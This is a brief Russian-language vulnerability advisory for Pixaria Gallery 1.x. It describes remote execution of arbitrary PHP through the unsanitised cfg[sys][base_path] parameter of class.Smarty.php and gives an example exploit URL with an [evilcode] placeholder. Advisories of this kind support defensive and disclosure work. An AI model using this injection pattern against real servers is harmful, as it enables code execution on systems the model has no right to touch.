Программа: Pixaria Gallery 1.x

Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных в параметре «cfg[sys][base_path]» сценарием class.Smarty.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера.

Пример:

http://www.target.com/resources/includes/class.Smarty.php?cfg[sys][base_path]=[evilcode]



Оставить мнение